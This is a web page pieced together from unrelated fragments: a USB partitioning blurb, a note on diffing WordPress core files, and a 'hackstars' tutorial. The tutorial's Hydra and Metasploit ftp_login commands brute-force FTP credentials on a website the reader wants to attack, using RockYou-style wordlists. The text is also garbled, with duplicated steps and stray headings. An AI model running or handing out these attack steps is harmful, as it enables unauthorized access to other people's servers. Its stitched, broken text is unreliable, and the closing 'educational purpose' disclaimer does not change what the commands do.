- Jan 27, 2009 USB Hack: Turn a USB Stick Into a Hard Drive or Local Disk. Rich Gates January 27, 2009 USB Hacks, USB Tutorials. USB Tutorial: Turn a USB stick into a Hard Drive or Local Disk. This is a very valuable tutorial, especially if you are looking to partition a USB stick.
- Download the original WordPress core files from the GitHub repository. Download the files from your server using cPanel. Run a diffchecker between the two files. The worst part about this idea is that you would have to go through each file on a hacked WordPress site one at a time and check for differences.
Now, most hosters and recent versions of WordPress will block a scan like this by default. So most likely this is only going to work with outdated WordPress versions without any protection from a hoster. Ok, so far so good. Now we can verify that by checking if the login page exists by navigating to the website URL + /wp-admin like so.
Hi…hackstars, In this post ‘m gonna take you all the way through on How to Hack ftp server and furthermore how to gain root access to manipulate databases. All these actions can be done both via smartphone or PC. So lets get started on
How to Hack FTP Server using Hydra and Metasploit :
For Smartphone users :
- Install Termux via Playstore.Open Termux ,it will install all necessary packages(it take few seconds, time will depend on your connection speed).Now type these commands to download necessary packages.
apt-get update && apt-get upgrade
pkg install python
pkg install python2
pkg install git
pkg install dnsutils
pkg install nmap
Now we are ready to go…
Using Hydra to Hack FTP Server:
For Smartphone users they just need to download Hydra which can be done by following command
pkg install hydra
For PC linux users(especially Kali Linux) Hydra is pre-installed.
Now both Smartphone users or linux PC users just type the commands as shown :
- First you have to find out the IP address of website onto which you want to attack. For this you can try dnslookup or any online tools like iplookup or reverse dns.
2. Now it’s time to check whether FTP port is up or not. For this use nmap.
2. Meanwhile it’s time to check whether FTP port is up or not. For this use nmap.
3. It will give its output, check if ftp port(port 21) is open or up.
Here as you can see Port 21 or ftp port is open,so we can further process the attack.
4. Choose a username and password list for BruteForcing the ftp admin panel. For Kali linux users many password lists are certainly available in
/usr/share/wordlists/. For example – RockYou.
Smartphone users can download username list and password list from any website they want or even they can create a .txt file and write password in it line by line.
Same procedure is for username too.
Also Read :- Hack an Android Phone with another Android
5. Now the final step is to launch the attack via Hydra
Syntax for Hydra is >
hydra -d -L /username-list path -P /password-list path ftp : ip_address
As in my case username list file is username.txt & password list file is password.txt and both are stored in downloads folder of my phone.
So, here’s the command in my case
hydra -d -L /storage/emulated/0/username.txt -P /storage/emulated/0/password.txt ftp://188.8.131.52
Here -d will show you each password attempt ,you can also ignore it. Its optional.
Likewise if you want to use only one username you can use -l (small L) in place of -L and then in place of username_file path just write that username that you want. Same in case of password if you want to use only one password just replace -P with -p.
After that you are all done, if any password matches it will show you the result.
Using Metasploit :
- For Smartphone users they just need to download Metasploit-Frameworkwhich can be done by following command
pkg install unstable-repo
pkg Install metasploit
- For PC linux users(especially Kali Linux) Metasploit is pre-installed.
Now we can get started,
1. Firstly launch Metasploit-Framework by typing following command
2. Secondly write following commands
msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254
msf auxiliary(ftp_login) > set THREADS 205
msf auxiliary(ftp_login) > set USERNAME username-list
How To Hack Wp Website To Download Files
msf auxiliary(ftp_login) > set PASSWORD password-list
If you want to use username-list or password-list you can simply write the path at suitable positions.
Now just be patient meanwhile let it crack the admin panel.
Once it gets the correct id and password it will show you.
So, this is how you gonna hack ftp server using either Hydra or Metasploit-Framework.
Note –This is only for educational purpose and I’m not responsible for any misuse or harm done.
If you need any help then feel free to ask me in comment.